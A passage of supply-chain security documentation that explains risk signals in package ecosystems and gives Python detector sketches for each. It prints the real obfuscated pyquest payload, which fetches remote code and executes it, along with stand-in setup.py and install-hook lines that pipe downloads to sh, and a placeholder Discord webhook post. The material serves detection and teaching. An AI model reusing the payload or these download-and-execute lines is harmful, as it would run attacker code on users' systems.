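SECTIONS = ("dependencies", "devDependencies", "optionalDependencies")


def unverifiable_dependencies(package_json_text: str) -> dict:
    """Return {name: specifier} for dependencies not resolved by registry version."""
    manifest = json.loads(package_json_text)
    flagged = {}
    for section in SECTIONS:
        for name, spec in (manifest.get(section) or {}).items():
            if spec.startswith(REMOTE_PREFIXES) or GITHUB_SHORTHAND.match(spec):
                flagged[name] = spec
    return flagged


# Hypothetical manifest; the react entry mirrors the example in the text.
SAMPLE_MANIFEST = """
{
  "name": "example-pkg",
  "dependencies": {
    "react": "git://github.com/facebook/react.git",
    "lodash": "^4.17.21"
  },
  "devDependencies": {
    "helper": "some-user/helper#main"
  }
}
"""

print(unverifiable_dependencies(SAMPLE_MANIFEST))
```

Ordinary version ranges such as ^4.17.21 are left alone because they resolve through the registry.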
Python build hook
In the Python ecosystem, the pyproject.toml file defines a project’s build system and configuration. It supports build hooks that run custom code during the build process via tools such as Hatch, PDM, or Poetry. Build hooks provide flexibility for automating build tasks, customizing workflows, and integrating complex operations such as compiling native extensions. This functionality supports modern Python project workflows but requires careful handling to maintain security and reliability.
Importance
Although build hooks are powerful, they can introduce significant security risks if misused. Because build-hook code executes automatically during package installation, an attacker could run unauthorized commands or distribute malware. Review build scripts carefully and validate the integrity and trustworthiness of any external packages that define them. For more information, see Modern Python Build Hooks.
Remote executable
An executable file is a compiled binary designed to run on a host system and perform tasks according to its programmed instructions.
Importance
Executable files are not inherently malicious. Most software running on a computer is an executable program. However, open-source packages rarely reference URLs that point to executable files. This behavior can indicate a potential malware dropper. A package that downloads an executable from a remote URL, writes it to disk, and executes it is highly suspicious. This activity might signal an attempt to install or run unauthorized software. Developers and security teams should treat this pattern as a serious warning and investigate the package’s source and behavior before using it.
Example
In August 2022, researchers discovered about a dozen malicious packages on PyPI that attempted a typosquatting attack. If installed, these packages downloaded an executable payload from a malicious URL, saved it to disk, and executed the file, all from within setup.py. In one observed case, the executable recruited the host machine into a DDoS campaign against a Russian Counter-Strike server.
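One simple way to surface this pattern is to search package source for URLs whose path ends in an executable file extension. The following sketch assumes a small, illustrative extension list and a hypothetical function name, find_executable_urls; a real analyzer would likely combine it with other signals, such as whether the downloaded file is later written to disk and run.

```python
import re

# Illustrative extension list, not an exhaustive one.
_EXECUTABLE_URL = re.compile(
    r"https?://[^\s'\"<>]+\.(?:exe|dll|scr|msi|bat|elf|bin)\b",
    re.IGNORECASE,
)


def find_executable_urls(source: str) -> list[str]:
    """Return URLs in the source text that appear to point at executables."""
    return _EXECUTABLE_URL.findall(source)


# Hypothetical snippet resembling a dropper inside setup.py (never executed here).
sample = '''
from urllib.request import urlretrieve
urlretrieve("http://example.invalid/payload.exe", "update.exe")
docs = "https://example.invalid/guide.html"
'''
print(find_executable_urls(sample))
```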
Ruby install hooks
In the RubyGems ecosystem, install hooks permit arbitrary code execution during gem installation via a rubygems_plugin.rb file. Developers define actions to run before installation with Gem.pre_install or after installation using Gem.post_install. This feature automates setup tasks such as configuring software, validating dependencies, and setting environment variables. While useful for streamlining installation workflows, this capability requires careful consideration due to its potential security impact.
Importance
Ruby install hooks provide flexibility and convenience but also introduce significant security risks. Because install hooks permit arbitrary code execution, attackers can exploit them to perform unauthorized actions during gem installation. Review and verify the source and integrity of any gem that uses install hooks before adding it to your environment. Use trusted repositories and scan gems for unexpected install behavior to reduce the risk of supply-chain attacks.
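To check whether a gem registers install hooks, a reviewer can search its rubygems_plugin.rb file for calls to Gem.pre_install or Gem.post_install. The Python sketch below does this with a line-based scan; the function name find_install_hooks and the sample plugin contents are hypothetical, and the scan does not parse Ruby, so it can miss hooks registered indirectly.

```python
import re

_HOOK_CALL = re.compile(r"\bGem\.(pre_install|post_install)\b")


def find_install_hooks(plugin_source: str) -> list[tuple[int, str]]:
    """Return (line number, hook name) pairs for install hooks in Ruby source."""
    findings = []
    for line_number, line in enumerate(plugin_source.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # skip Ruby comment lines
        for match in _HOOK_CALL.finditer(line):
            findings.append((line_number, match.group(1)))
    return findings


# Hypothetical rubygems_plugin.rb contents, held as text and never executed.
sample = """\
# rubygems_plugin.rb
Gem.post_install do |installer|
  system("curl https://example.invalid/setup.sh | sh")
end
"""
print(find_install_hooks(sample))
```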
Secrets
When publishing software to an open-source ecosystem, avoid including private credentials and other sensitive information in the codebase. Accidental exposure can occur in several ways, such as committing configuration or production files, or through a misconfigured continuous integration/continuous deployment (CI/CD) pipeline. These mistakes can expose sensitive data (for example, API keys, access tokens, or passwords) and lead to unauthorized access, data breaches, or other security incidents.
Importance
Using open-source software that contains exposed secrets creates several security and compliance risks:
- Reduced trust and software integrity: Leaked secret keys damage trust in the software and its development process and may indicate broader weaknesses in the organization’s security posture.
- Increased risk of supply-chain attacks: Leaked credentials can let attackers compromise developer accounts, CI/CD systems, or dependent applications, which can lead to injected malicious code, removal of legitimate software, or compromise of downstream users.
- Legal and regulatory concerns: Depending on the exposed secret and applicable laws, using or distributing software with leaked credentials may cause noncompliance or legal liability.
Example
In 2022, a hacker obtained hardcoded credentials to Uber’s privileged access management platform and used them to take over several internal applications and tools. Although the credentials did not come from published open-source software, this case highlights the importance of protecting sensitive credentials for every application.
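Secret scanning is commonly based on pattern matching. The sketch below shows the idea with three illustrative patterns: the AKIA prefix format of AWS access key IDs, PEM private key headers, and a naive hard-coded password assignment. The pattern set and the function name find_secrets are assumptions made for this example, and the sample values are placeholders rather than real credentials.

```python
import re

# Illustrative patterns only; production scanners use far larger rule sets.
_PATTERNS = {
    "AWS access key ID": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private key header": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "hard-coded password": re.compile(r"(?i)\bpassword\s*=\s*['\"][^'\"]{4,}['\"]"),
}


def find_secrets(text: str) -> list[tuple[int, str]]:
    """Return (line number, pattern label) pairs for likely secrets."""
    findings = []
    for line_number, line in enumerate(text.splitlines(), start=1):
        for label, pattern in _PATTERNS.items():
            if pattern.search(line):
                findings.append((line_number, label))
    return findings


# Placeholder values; the key below is the example key ID from AWS documentation.
sample = """\
region = "us-east-1"
aws_key = "AKIAIOSFODNN7EXAMPLE"
password = "hunter2-not-real"
"""
print(find_secrets(sample))
```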
Strange Python imports
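In Python, most modules and packages are imported using standard syntax such as import module or from module import name. This practice is explicitly recommended in the PEP 8 Style Guide for Python Code. Python also permits less conventional imports, such as calling the built-in __import__() function with a module name written as an escaped string.
For example, the following is functionally similar to import os: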
# Import our `os` package
xyz = __import__("\x6F\x73")
# Use our imported package
xyz.system("whoami")
At first glance, the os import is not obvious. Authors often use this pattern to obscure functionality and hide potentially nefarious behavior.
Importance
Code that obfuscates its imports is difficult to review and often does so to hide malicious behavior. Review any package that contains these imports and reconsider its use in your project.
Example
In 2022, several packages on PyPI used imports like these. The typosquatted package pyquest contained such imports hidden in an otherwise benign file.
;__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').exec(__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').compile(__import__('\x62\x61\x73\x65\x36\x34').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCgpfdHRtcCA9IF9mZmlsZShkZWxldGU9RmFsc2UpCl90dG1wLndyaXRlKGIiIiJmcm9tIHVybGxpYi5yZXF1ZXN0IGltcG9ydCB1cmxvcGVuIGFzIF91dXJsb3BlbjtleGVjKF91dXJsb3BlbignaHR0cHM6Ly96ZXJvdHdvLWJlc3Qtd2FpZnUub25saW5lLzc3ODExMjk4NTc0MzI1MS93YXAvc2hhdGxlZ2F5L2luamVjdG9yMHg5NzQ4JykucmVhZCgpKSIiIikKX3R0bXAuY2xvc2UoKQp0cnk6IF9zc3lzdGVtKGYic3RhcnQge19lZXhlY3V0YWJsZS5yZXBsYWNlKCcuZXhlJywgJ3cuZXhlJyl9IHtfdHRtcC5uYW1lfSIpCmV4Y2VwdDogcGFzcw=="),'<string>','\x65\x78\x65\x63'))
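Imports like these can be detected statically. The sketch below uses the standard-library ast module to find __import__() calls whose module name is written with backslash escapes in the source, then reports the decoded name. The function name find_obfuscated_imports is hypothetical, and treating a backslash in the literal as a sign of obfuscation is an assumption chosen for simplicity.

```python
import ast


def find_obfuscated_imports(source: str) -> list[tuple[int, str]]:
    """Return (line number, decoded module name) for escaped __import__ calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id == "__import__"
            and node.args
            and isinstance(node.args[0], ast.Constant)
            and isinstance(node.args[0].value, str)
        ):
            arg = node.args[0]
            # Compare the raw literal text with its decoded value.
            raw = ast.get_source_segment(source, arg) or ""
            if "\\" in raw:
                findings.append((node.lineno, arg.value))
    return findings


# The first line mirrors the escaped import shown earlier; the second is plain.
sample = r'''xyz = __import__("\x6F\x73")
plain = __import__("sys")
'''
print(find_obfuscated_imports(sample))
```

Because the code is parsed rather than executed, the scan reveals that the escaped string decodes to os without running anything from the package.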
Suspicious setup commands
In a Python package, the setup.py file is used to build and distribute the package. It defines metadata (for example, the package name, version, and dependencies) as well as build and installation instructions. This file is used to publish packages to PyPI and to install them locally with commands such as pip install <package_name>. When a user installs a package, the setup.py file is automatically executed by the Python interpreter. This automation makes it a powerful and convenient tool for package management but also introduces potential security risks.
Importance
Because setup.py runs during installation, attackers can embed malicious code that executes automatically on the target system. A user can become compromised simply by installing a package, even if they never run it. Inspect setup.py files for dangerous commands (for example, file system modifications, network calls, or arbitrary code execution) and install packages only from trusted sources. Review installation scripts before execution to help prevent inadvertent malware deployment.
Example
The W4SP Stealer, one of the most prolifically distributed pieces of malware discovered so far on PyPI, was published in over 100 separate packages. Attackers often used setup.py as the first stage of a complex attack chain.
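A setup.py file can be inspected without running it. The following sketch parses the file with the standard-library ast module and reports calls that appear on a small watch list. The watch list and the function name find_risky_calls are assumptions for illustration; they are not a complete or authoritative set of dangerous commands, and calls reached through aliases or obfuscation would be missed.

```python
import ast

# Illustrative watch list, not an exhaustive or authoritative one.
_RISKY_CALLS = {
    "exec", "eval", "os.system",
    "subprocess.run", "subprocess.Popen", "urllib.request.urlopen",
}


def _dotted_name(node: ast.AST) -> str:
    """Rebuild a dotted name such as 'os.system' from an AST expression."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def find_risky_calls(setup_source: str) -> list[tuple[int, str]]:
    """Return sorted (line number, call name) pairs for watch-listed calls."""
    findings = []
    for node in ast.walk(ast.parse(setup_source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in _RISKY_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


# Hypothetical setup.py contents, held as text and never executed.
sample = """\
import os
from setuptools import setup

os.system("curl https://example.invalid/stage2 | sh")
setup(name="demo", version="0.1")
"""
print(find_risky_calls(sample))
```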
Suspicious URL references
Certain URLs, while not inherently malicious, can indicate suspicious or potentially harmful behavior when referenced in open-source software. Review these URLs in context to determine their legitimacy and intent.
Common examples include:
- Paste tools - services such as Pastebin.com store and share text or code snippets. Attackers can host malicious code there that compromised software later downloads and executes.
- Web application security testing tools - references to penetration testing or vulnerability scanning servers might indicate that a package is probing systems for weaknesses that could later be exploited.
- Unusual content delivery networks (CDNs) - although CDNs are common for performance and distribution, references to obscure or untrusted CDNs might indicate that the package retrieves and executes external files.
- Obfuscation tools - these tools deliberately make source code difficult to read or analyze. Their presence in a package might indicate an attempt to conceal malicious logic.
- Reverse shells - references to web-based reverse shell tools (for example, tcp.ngrok.io) might suggest that the package is designed to provide unauthorized remote access to a victim’s system.
- Data exfiltration tools - these tools enable attackers to transfer stolen data from a compromised system to an external location.
- Public IP address checking services - legitimate software rarely needs to know the system’s public IP address. References to such APIs may indicate that the package is collecting network information for malicious purposes.
- Tor Darknet to Clearnet proxy services - connections to Tor proxy services can hide the origin or destination of network traffic, which is suspicious in open-source software.
Importance
Although the URLs and services listed above are not inherently malicious, their appearance in open-source software should prompt careful scrutiny. Evaluate each reference’s purpose to determine whether it serves a legitimate function or indicates possible malicious intent.
Example
In 2020, researchers found that the Discord CDN hosted malicious software such as Epsilon ransomware, the RedLine stealer, and the XMRig cryptocurrency miner.
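The categories above lend themselves to a lookup by hostname. The sketch below extracts URLs from source text and matches each host against a short table of suffixes. The table is hypothetical and intentionally tiny: pastebin.com and tcp.ngrok.io come from the list above, while cdn.discordapp.com and api.ipify.org are assumed examples of a content delivery network and a public IP address checking service. The function name classify_urls is also an assumption.

```python
import re
from urllib.parse import urlparse

# Illustrative host suffixes per category; hypothetical and far from complete.
_SUSPICIOUS_HOSTS = {
    "pastebin.com": "paste tool",
    "tcp.ngrok.io": "reverse shell",
    "cdn.discordapp.com": "content delivery network",
    "api.ipify.org": "public IP address check",
}
_URL = re.compile(r"https?://[^\s'\"<>)]+")


def classify_urls(source: str) -> list[tuple[str, str]]:
    """Return (url, category) pairs for URLs whose host is on the watch list."""
    findings = []
    for url in _URL.findall(source):
        host = (urlparse(url).hostname or "").lower()
        for suffix, category in _SUSPICIOUS_HOSTS.items():
            if host == suffix or host.endswith("." + suffix):
                findings.append((url, category))
    return findings


# Hypothetical package source, held as text and never executed.
sample = '''
data = urlopen("https://pastebin.com/raw/XXXXXXXX").read()
ip = urlopen("https://api.ipify.org").read()
home = "https://example.invalid/docs"
'''
print(classify_urls(sample))
```

A match only flags the reference for review in context. As noted above, these services are not inherently malicious.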
Typosquatting
Typosquatting happens when attackers exploit common typographical errors developers make when specifying package names. For example, a developer intending to install the popular UI framework react might accidentally type raect - transposing the letters a and e. Attackers can exploit these mistakes by publishing packages under the misspelled names. In some cases, attackers include legitimate functionality (for example, the real react package) alongside hidden malicious code, which makes the compromise harder to detect. As a result, developers who inadvertently install these impostor packages may unknowingly execute harmful code on their systems.
Importance
Even a small typographical error in a package name can install a malicious dependency and introduce critical security threats. To mitigate this risk, always verify package names, versions, and sources before installation, and consider using tools or registries that flag potential typosquatted packages.
Example
Typosquatted packages are routinely removed from open-source ecosystems. High-profile incidents in NPM, PyPI, and other registries have increased in recent years. In December 2019, researchers uncovered a malicious Python package called Jeilyfish. It contained a backdoored implementation of the legitimate Jellyfish package that stole SSH and GPG keys. That package existed for over a year before detection and averaged several hundred downloads per month.
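One way tools can flag likely typosquats is to measure how close a requested name is to the names of popular packages. The sketch below uses the optimal string alignment distance, a variant of edit distance that counts a swap of two adjacent characters as a single edit, so raect is one edit away from react. The function names and the threshold of one edit are assumptions for illustration, not a description of how any particular registry or product performs this check.

```python
def osa_distance(a: str, b: str) -> int:
    """Edit distance where an adjacent transposition counts as one edit."""
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(
                d[i - 1][j] + 1,         # deletion
                d[i][j - 1] + 1,         # insertion
                d[i - 1][j - 1] + cost,  # substitution or match
            )
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[-1][-1]


def possible_typosquats(name: str, popular: list[str], max_distance: int = 1) -> list[str]:
    """Return popular names that the given name closely resembles but does not equal."""
    name = name.lower()
    return [p for p in popular if 0 < osa_distance(name, p.lower()) <= max_distance]


# Hypothetical list of well-known package names to compare against.
popular_names = ["react", "jellyfish", "requests"]
print(possible_typosquats("raect", popular_names))
print(possible_typosquats("jeilyfish", popular_names))
```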
Webhook exfil
A Discord webhook is a feature external services use to send automated messages or notifications to a specific Discord channel. Although this functionality supports automation and monitoring, attackers also use it for data exfiltration in credential-stealing malware.
Importance
The presence of a hard-coded webhook within an open-source software package is a strong indicator of potential malicious intent. When a webhook is combined with a POST request, it can exfiltrate sensitive data (for example, credentials, tokens, or environment variables) to an external destination. Most malware that uses webhook exfiltration executes during package installation. For example, running a command such as pip install <package> (for PyPI) can trigger automatic exfiltration. Treat any package that contains webhook references with caution and review its code for data-exfiltration mechanisms before installation.
Example
Using a Discord webhook for data exfiltration is a relatively new technique, but it has been widely observed and documented. Often, these stealers activate during package installation and are visible on a cursory code review. However, in March 2023, Phylum published an article describing how attackers now use this method more subtly by concealing the stealer code deep within existing packages.
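Hard-coded Discord webhooks follow a recognizable URL shape, https://discord.com/api/webhooks/<id>/<token>, which makes them straightforward to search for. The sketch below is a minimal example of such a search; the function name find_webhooks is hypothetical, the sample URL uses placeholder values, and encoded or dynamically assembled URLs would not be found this way.

```python
import re

# Matches discord.com and discordapp.com hosts, with an optional subdomain.
_DISCORD_WEBHOOK = re.compile(
    r"https://(?:[a-z]+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+"
)


def find_webhooks(source: str) -> list[str]:
    """Return hard-coded Discord webhook URLs found in the source text."""
    return _DISCORD_WEBHOOK.findall(source)


# Hypothetical package source with a placeholder webhook, never executed.
sample = '''
import requests
HOOK = "https://discord.com/api/webhooks/000000000000000000/EXAMPLE-TOKEN_not-real"
requests.post(HOOK, json={"content": "hello"})
'''
print(find_webhooks(sample))
```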